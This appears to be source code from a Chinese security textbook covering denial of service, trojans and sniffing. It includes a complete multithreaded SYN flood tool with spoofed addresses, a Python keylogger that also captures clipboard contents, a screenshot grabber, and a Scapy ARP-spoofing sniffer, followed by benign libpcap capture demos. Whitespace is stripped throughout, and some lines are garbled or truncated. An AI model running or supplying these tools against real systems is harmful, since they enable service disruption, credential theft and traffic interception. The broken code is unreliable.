第6章拒绝服务攻击/*===================================================*基于winpcap的多线程SYNFlood攻击源代码*运行平台:WinXP,Win2k3,WinVista,Win2k8,Win7*编译环境:VC6.0+winpcapSDK*====================================================*/#defineWIN32_LEAN_AND_MEAN#define_WSPIAPI_COUNTOF#include<windows.h>#include<winsock2.h>#include<stdio.h>#include<stdlib.h>#include<pcap.h>#include<packet32.h>#pragmacomment(lib,"ws2_32.lib")#pragmacomment(lib,"wpcap.lib")#pragmacomment(lib,"packet.lib")#defineMAXTHREAD 20#defineOID_802_3_CURRENT_ADDRESS 0x01010102#defineOPTION_LENTH 6#defineSYN_DEST_IP "2" //被攻击的IP#defineSYN_DEST_PORT 80 //被攻击的PORT#defineFAKE_IP "1" //伪装的IP#defineFAKE_MAC "\xB8\xAC\x6F\x1F\x26\xF6" //伪装的MAC//内存对齐设置必须是1#pragmapack(1)typedefstructet_header //以太网首部{ unsignedchar eh_dst[6]; //目的MAC unsignedchar eh_src[6]; //源MAC unsignedshort eh_type; //上层协议类型}ET_HEADER;typedefstructip_hdr //IP首部{ unsignedchar h_verlen; //版本与首部长度 unsignedchar tos; //区分服务 unsignedshort total_len; //总长度 unsignedshort ident; //标识 unsignedshort frag_and_flags;//3位的标志与13位的片偏移 unsignedchar ttl; //生存时间 unsignedchar proto; //协议 unsignedshort checksum; //首部校验和 unsignedint sourceIP; //源IP unsignedint destIP; //目的IP}IP_HEADER;typedefstructtcp_hdr //TCP首部{ unsignedshort th_sport; //16位源端口 unsignedshort th_dport; //16位目的端口 unsignedint th_seq; //32位序列号 unsignedint th_ack; //32位确认号 unsignedshort th_data_flag; //16位标志位 unsignedshort th_win; //16位窗口大小 unsignedshort th_sum; //16位校验和 unsignedshort th_urp; //16位紧急数据偏移量 unsignedint option[OPTION_LENTH];}TCP_HEADER;typedefstructpsd_hdr //TCP伪首部{ unsignedlong saddr; //源地址 unsignedlong daddr; //目的地址 char mbz; char ptcl; //协议类型 unsignedshort tcpl; //TCP长度}PSD_HEADER;typedefstruct_SYN_PACKET //最终SYN包结构{ ET_HEADER eth; //以太网头部 IP_HEADER iph; //arp数据包头部 TCP_HEADER tcph; //tcp数据包头部}SYN_PACKET;#pragmapack()typedefstruct_PARAMETERS //传递给线程的参数体{ unsignedint srcIP; unsignedint dstIP; unsignedshort dstPort; unsignedchar* srcmac; unsignedchar dstmac[6]; pcap_t* 
adhandle;}PARAMETERS,*LPPARAMETERS;//获得网卡的MAC地址unsignedchar*GetSelfMac(char*pDevName){ staticu_charmac[6]; memset(mac,0,sizeof(mac)); LPADAPTERlpAdapter=PacketOpenAdapter(pDevName); if(!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE)) { returnNULL; } PPACKET_OID_DATAOidData= (PPACKET_OID_DATA)malloc(6+sizeof(PACKET_OID_DATA)); if(OidData==NULL) { PacketCloseAdapter(lpAdapter); returnNULL; } OidData->Oid=OID_802_3_CURRENT_ADDRESS; OidData->Length=6; memset(OidData->Data,0,6); BOOLEANStatus=PacketRequest(lpAdapter,FALSE,OidData); if(Status) { memcpy(mac,(u_char*)(OidData->Data),6); } free(OidData); PacketCloseAdapter(lpAdapter); returnmac;}//计算校验和unsignedshortCheckSum(unsignedshort*buffer,intsize){ unsignedlongcksum=0; while(size>1) { cksum+=*buffer++; size-=sizeof(unsignedshort); } if(size) { cksum+=*(unsignedchar*)buffer; } cksum=(cksum>>16)+(cksum&0xffff); cksum+=(cksum>>16); return(unsignedshort)(~cksum);}//封装ARP请求包voidBuildSYNPacket(SYN_PACKET&packet, unsignedchar*source_mac, unsignedchar*dest_mac, unsignedlongsrcIp, unsignedlongdestIp, unsignedshortdstPort){ PSD_HEADERPsdHeader; //定义以太网头部 memcpy(packet.eth.eh_dst,dest_mac,6); memcpy(packet.eth.eh_src,source_mac,6); packet.eth.eh_type =htons(0x0800); //ARP协议类型值为0x0800 //定义IP头 packet.iph.h_verlen =0; packet.iph.h_verlen =((4<<4)|sizeof(IP_HEADER)/sizeof(unsignedint)); packet.iph.tos =0; packet.iph.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)); packet.iph.ident =1; packet.iph.frag_and_flags=htons(1<<14); packet.iph.ttl =128; to =IPPROTO_TCP; packet.iph.checksum =0; packet.iph.sourceIP =srcIp; packet.iph.destIP =destIp; //定义TCP头 packet.tcph.th_sport=htons(rand()%60000+1024); packet.tcph.th_dport=htons(dstPort); packet.tcph.th_seq =htonl(rand()%900000000+100000); packet.tcph.th_ack =0; packet.tcph.th_data_flag=0; packet.tcph.th_data_flag=(11<<4|2<<8); packet.tcph.th_win =htons(512); packet.tcph.th_sum =0; packet.tcph.th_urp =0; packet.tcph.option[0]=htonl(0X020405B4); 
packet.tcph.option[1]=htonl(0x01030303); packet.tcph.option[2]=htonl(0x0101080A); packet.tcph.option[3]=htonl(0x00000000); packet.tcph.option[4]=htonl(0X00000000); packet.tcph.option[5]=htonl(0X01010402); //构造伪头部 PsdHeader.saddr=srcIp; PsdHeader.daddr=packet.iph.destIP; PsdHeader.mbz=0; PsdHeader.ptcl=IPPROTO_TCP; PsdHeader.tcpl=htons(sizeof(TCP_HEADER)); BYTEBuffer[sizeof(PsdHeader)+sizeof(TCP_HEADER)]={0}; memcpy(Buffer,&PsdHeader,sizeof(PsdHeader)); memcpy(Buffer+sizeof(PsdHeader),&packet.tcph,sizeof(TCP_HEADER)); packet.tcph.th_sum=CheckSum((unsignedshort*)Buffer, sizeof(PsdHeader)+sizeof(TCP_HEADER)); memset(Buffer,0,sizeof(Buffer)); memcpy(Buffer,&packet.iph,sizeof(IP_HEADER)); packet.iph.checksum=CheckSum((unsignedshort*)Buffer,sizeof(IP_HEADER)); return;}//发包线程函数DWORDWINAPISYNFloodThread(LPVOIDlp){ PARAMETERSparam; param=*((LPPARAMETERS)lp); Sleep(10); while(true) { SYN_PACKETpacket; BuildSYNPacket(packet,param.srcmac,param.dstmac, param.srcIP,param.dstIP,param.dstPort); if(pcap_sendpacket(param.adhandle, (constunsignedchar*)&packet, sizeof(packet))==-1) { fprintf(stderr,"pcap_sendpacketerror.\n"); } } return1;}intmain(intargc,char*argv[]){ unsignedlongfakeIp=inet_addr(FAKE_IP); //要伪装成的IP地址 if(fakeIp==INADDR_NONE) { fprintf(stderr,"InvalidIP:%s\n",FAKE_IP); return-1; } unsignedlongdestIp=inet_addr(SYN_DEST_IP); //目的IP if(destIp==INADDR_NONE) { fprintf(stderr,"InvalidIP:%s\n",SYN_DEST_IP); return-1; } unsignedshortdstPort=SYN_DEST_PORT; //目的端口 if(dstPort<0||dstPort>65535) { fprintf(stderr,"InvalidPort return-1; } pcap_if_t *alldevs; //全部网卡列表 pcap_if_t *d; //一个网卡 pcap_addr_t *pAddr; //网卡地址 charerrbuf[PCAP_ERRBUF_SIZE]; //错误缓冲区 if(pcap_findalldevs(&alldevs,errbuf)==-1) //获得本机网卡列表 { fprintf(stderr,"Errorinpcap_findalldevs:%s\n",errbuf); exit(1); } inti=0; for(d=alldevs;d;d=d->next) { printf("%d",++i); if(d->description) printf(".%s\n",d->description); else printf(".Nodescriptionavailable\n"); } if(i==0) { fprintf(stderr,"\nNointerfacesfound!\n"); return-1; } 
printf("Entertheinterfacenumber(1-%d):",i); intinum; scanf("%d",&inum);//用户选择的网卡序号 if(inum<1||inum>i) { printf("\nInterfacenumberoutofrange.\n"); pcap_freealldevs(alldevs); return-1; } HANDLE threadhandle[MAXTHREAD]; PARAMETERSparam; //设置目的MAC地址 memcpy(param.dstmac,FAKE_MAC,6); //填充线程的参数体 param.dstIP=destIp; param.srcIP=fakeIp; param.dstPort=dstPort; //移动指针到用户选择的网卡 for(d=alldevs,i=0;i<inum-1;d=d->next,i++); param.srcmac=GetSelfMac(d->name); printf("发送SYN包,本机(%.2X-%.2X-%.2X-%.2X-%.2X-%.2X)试图伪装成%s\n", param.srcmac[0], param.srcmac[1], param.srcmac[2], param.srcmac[3], param.srcmac[4], param.srcmac[5],FAKE_IP); if((param.adhandle=pcap_open_live(d->name,65536,0,1000,errbuf))==NULL) { fprintf(stderr,"\nUnabletoopenadapter.\n"); pcap_freealldevs(alldevs); return-1; } pAddr=d->addresses; while(pAddr) { //创建多线程 for(inti=0;i<MAXTHREAD;i++) { threadhandle[i]=CreateThread(NULL,0,SYNFloodThread,(void*)¶m,0,NULL); if(!threadhandle) { printf("CreateThreaderror:%d\n",GetLastError()); } Sleep(100); } pAddr=pAddr->next; } printf("退出请输入q或者Q!\n"); charcQuit; do{ cQuit=getchar(); }while(cQuit!='q'&&cQuit!='Q'); return0;}
第7章计算机木马###############################################################################程序名:keylogger.py#功能:利用Python第三方库PyHook实现键盘记录#说明:运行平台Windows。它利用Windows的SetWindowsHookEx函数注册了一个自#定义的钩子函数,通过函数就能截获用户的按键消息。##############################################################################fromctypesimport*importpythoncomimportpyHookimportwin32clipboarduser32=windll.user32kernel32=windll.kernel32psapi=windll.psapicurrent_window=Nonedefget_current_process():hwnd=user32.GetForegroundWindow()#获得前台窗口句柄pid=c_ulong(0)user32.GetWindowThreadProcessId(hwnd,byref(pid))process_id="%d"%pid.value#获得进程PIDexecutable=create_string_buffer("\x00"*512)h_process=kernel32.OpenProcess(0x400|0x10,False,pid)psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)#获得进程名window_title=create_string_buffer("\x00"*512)length=user32.GetWindowTextA(hwnd,byref(window_title),512)#获得窗口名printprint"[PID:%s-%s-%s]"%(process_id,executable.value,window_title.value)printkernel32.CloseHandle(hwnd)kernel32.CloseHandle(h_process)defkey_event(event):globalcurrent_windowifevent.WindowName!=current_window:#检查目标是否切换了窗口current_window=event.WindowNameget_current_process()ifevent.Ascii>32andevent.Ascii<127:#检查是否为常规按键printchr(event.Ascii),else:ifevent.Key=="V":#如果是Ctrl+V,则获取剪贴板内容win32clipboard.OpenClipboard()pasted_value=win32clipboard.GetClipboardData()win32clipboard.CloseClipboard()print"[PASTE]-%s"%(pasted_value),else:print"[%s]"%event.Key,returnTrue#返回到下一个钩子事件defkey_logger():hooker=pyHook.HookManager()#创建钩子函数管理器hooker.KeyDown=key_event#注册钩子按键事件的处理函数hooker.HookKeyboard()#创建键盘钩子pythoncom.PumpMessages()if__name__=='__main__':key_logger()
###############################################################################程序名:screenshot.py#功能:利用Python第三方库PyWin32实现截取屏幕功能,将截取的屏幕保存在C盘#上的文件screen.bmp中。#说明:运行平台Windows。##############################################################################importwin32guiimportwin32uiimportwin32conimportwin32apidefscreen_shot():hdesktop=win32gui.GetDesktopWindow()#获得桌面窗口句柄#获得显示器尺寸width=win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)height=win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)left=win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)top=win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)desktop_dc=win32gui.GetWindowDC(hdesktop)#创建设备描述表img_dc=win32ui.CreateDCFromHandle(desktop_dc)mem_dc=img_dc.CreateCompatibleDC()#创建基于内存的设备描述表screenshot=win32ui.CreateBitmap()screenshot.CreateCompatibleBitmap(img_dc,width,height)#创建位图对象mem_dc.SelectObject(screenshot)mem_dc.BitBlt((0,0),(width,height),img_dc,(left,top),win32con.SRCCOPY)#复制屏幕screenshot.SaveBitmapFile(mem_dc,'c:\\screen.bmp')#将位图保存到文件mem_dc.DeleteDC()#释放对象win32gui.DeleteObject(screenshot.GetHandle())if__name__=='__main__':screen_shot()
##############################################################################程序名:arpspoof.py#功能:利用Python开发包Scapy实现ARP欺骗#说明:运行平台Linux。##############################################################################fromscapy.allimport*importosimportsysimportthreadinginterface="eth0"target_ip="22"gateway_ip=""packet_count=1000spoofing=Truedefget_mac(ip_address):responses,unanswered=srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)fors,rinresponses:returnr[Ether].srcreturnNonedefspoof_target(gateway_ip,gateway_mac,target_ip,target_mac):globalspoofingspoof_target=ARP()spoof_target.op=2spoof_target.psrc=gateway_ipspoof_target.pdst=target_ipspoof_target.hwdst=target_macspoof_gateway=ARP()spoof_gateway.op=2spoof_gateway.psrc=target_ipspoof_gateway.pdst=gateway_ipspoof_gateway.hwdst=gateway_macprint"[+]BeginningtheARPspoof.[CTRL+Ctostop]"whilespoofing:send(spoof_target)send(spoof_gateway)time.sleep(2)print"[*]ARPspoofattackfinished."returndefrestore_target(gateway_ip,gateway_mac,target_ip,target_mac):print"[*]Restoringtarget..."send(ARP(op=2,psrc=gateway_ip,pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)send(ARP(op=2,psrc=target_ip,pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)defarp_spoof():conf.iface=interfaceconf.verb=0print"[+]Settingup%s"%interfacegateway_mac=get_mac(gateway_ip)#1.获取网关MAC地址ifgateway_macisNone:print"[-]FailedtogetgatewayMAC.Exiting."sys.exit(0)else:print"[+]Gateway%sisat%s"%(gateway_ip,gateway_mac)target_mac=get_mac(target_ip)#2.获取目标MAC地址iftarget_macisNone:print"[-]FailedtogettargetMAC.Exiting."sys.exit(0)else:print"[+]Target%sisat%s"%(target_ip,target_mac)print"[+]startspoofthread."spoof_thread=threading.Thread(target=spoof_target,args=(gateway_ip,gateway_mac,target_ip,target_mac))#3.启动ARP欺骗进程spoof_thread.start()try:print"[+]Startingsnifferfor%dpackets"%packet_countbpf_filter="iphost%s"%target_ippackets=sniff(count=packet_count,filter=bpf_filter,iface=interface)#4.抓取目标流量exceptKeyboardIn
terrupt:passfinally:print"[+]Writingpacketstoarpspoof.pcap"wrpcap('arpsoof.pcap',packets)#5.将抓取的流量包写入到文件spoofing=Falsetime.sleep(2)restore_target(gateway_ip,gateway_mac,target_ip,target_mac)#6.还原网络配置sys.exit(0)if__name__=='__main__':arp_spoof()
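/* Chapter 9: network sniffing (第9章 网络监听技术) */
/**********************************************************************
 * Program 9-1: source of pcaptest1.c
 * Purpose: capture a single network packet, classify it by Ethernet
 *          type and print the type together with the destination and
 *          source hardware addresses.
 *********************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <time.h>              /* ctime() */
#include <pcap.h>              /* on some systems this is pcap/pcap.h */
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/if_ether.h>  /* pulls in net/ethernet.h */

/*
 * Print one hardware address as colon-separated hex bytes, preceded by
 * `label` and followed by a newline. Uses plain "%x" (no zero padding),
 * the same format the demo used for both addresses.
 */
static void print_mac(const char *label, const u_char *mac)
{
    printf("%s", label);
    for (int k = 0; k < ETHER_ADDR_LEN; k++) {
        printf("%s%x", (k == 0) ? "" : ":", mac[k]);
    }
    printf("\n");
}

/*
 * Open the default capture device, grab exactly one packet and describe it.
 * Returns 0 on success, 1 on any libpcap failure or when the packet is not
 * an IP/ARP frame (the original demo's exit(1) behaviour).
 */
int main(int argc, char **argv)
{
    char errbuf[PCAP_ERRBUF_SIZE];        /* libpcap error text */
    struct pcap_pkthdr hdr;               /* per-packet header: ts, caplen, len (pcap.h) */
    const struct ether_header *eptr;      /* net/ethernet.h */
    const u_char *packet;
    pcap_t *descr;
    char *dev;
    time_t ts_sec;

    (void)argc;                           /* the demo takes no arguments */
    (void)argv;

    /* Pick the default capture device. */
    dev = pcap_lookupdev(errbuf);
    if (dev == NULL) {
        printf("%s\n", errbuf);
        return 1;
    }
    printf("DEV: %s\n", dev);

    /* Open the device in non-promiscuous mode (third argument 0). */
    descr = pcap_open_live(dev, BUFSIZ, 0, -1, errbuf);
    if (descr == NULL) {
        printf("pcap_open_live(): %s\n", errbuf);
        return 1;
    }

    /* Grab exactly one packet. */
    packet = pcap_next(descr, &hdr);
    if (packet == NULL) {
        printf("Didn't grab packet\n");
        pcap_close(descr);
        return 1;
    }

    /* hdr.len is the on-wire length, hdr.caplen the number of bytes that
     * were actually captured; both are unsigned (bpf_u_int32), hence %u. */
    printf("Grabbed packet of length %u\n", hdr.len);

    /* Copy tv_sec into a real time_t: its width need not match time_t, so
     * casting its address is not safe. ctime() already ends with '\n'. */
    ts_sec = (time_t)hdr.ts.tv_sec;
    printf("Recieved at ..%s", ctime(&ts_sec));

    /* ETHER_HDR_LEN is the Ethernet header length (14), not an address length. */
    printf("Ethernet header length is %d\n", ETHER_HDR_LEN);

    /* Never look inside the frame before confirming the whole Ethernet header
     * was captured: a truncated capture (caplen < 14) would otherwise be
     * read past the end of the buffer. */
    if (hdr.caplen < sizeof(struct ether_header)) {
        printf("Captured only %u bytes, too short for an Ethernet header\n",
               hdr.caplen);
        pcap_close(descr);
        return 1;
    }

    /* Classify the frame by its EtherType. */
    eptr = (const struct ether_header *)packet;
    unsigned type = ntohs(eptr->ether_type);
    if (type == ETHERTYPE_IP) {
        printf("Ethernet type hex:%x dec:%u is an IP packet\n", type, type);
    } else if (type == ETHERTYPE_ARP) {
        printf("Ethernet type hex:%x dec:%u is an ARP packet\n", type, type);
    } else {
        /* Anything else is not handled by this demo. */
        printf("Ethernet type %x not IP\n", type);
        pcap_close(descr);
        return 1;
    }

    print_mac("Destination Address: ", eptr->ether_dhost);
    print_mac("Source Address: ", eptr->ether_shost);

    pcap_close(descr);
    return 0;
}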
/*******************************************************************************程序9-2:pcaptest2.c的源代码*功能:演示如何使用pcap_loop(),主要功能是连续捕获指定个数的网络分组后退出。******************************************************************************/#include<pcap.h>#include<stdio.h>#include<stdlib.h>#include<errno.h>#include<sys/socket.h>#include<netinet/in.h>#include<arpa/inet.h>#include<netinet/if_ether.h>/*定义函数pcap_loop()收到一个分组时的处理函数,这里仅打印收到的分组的序号,并没有对收到的分组作进一步的分析。它作为pcap_loop()的一个传入参数*/voidmy_callback(u_char*useless,conststructpcap_pkthdr*pkthdr,constu_char*packet){staticintcount=1;fprintf(stdout,"%d,",count);fflush(stdout);count++;}intmain(intargc,char**argv){inti;char*dev;charerrbuf[PCAP_ERRBUF_SIZE];pcap_t*descr;constu_char*packet;structpcap_pkthdrhdr;/*pcap.h*/structether_header*eptr;/*net/ethernet.h*/if(argc!=2){fprintf(stdout,"Usage:%snumpackets\n",argv[0]);return0;}dev=pcap_lookupdev(errbuf);/*查找网络设备*/if(dev==NULL){printf("%s\n",errbuf);exit(1);}/*打开网络设备*/descr=pcap_open_live(dev,BUFSIZ,0,-1,errbuf);if(descr==NULL){printf("pcap_open_live():%s\n",errbuf);exit(1);}/*调用pcap_loop()捕获atoi(argv[1])个网络分组后函数返回,每收到一个分组就调用my_callback()一次*/pcap_loop(descr,atoi(argv[1]),my_callba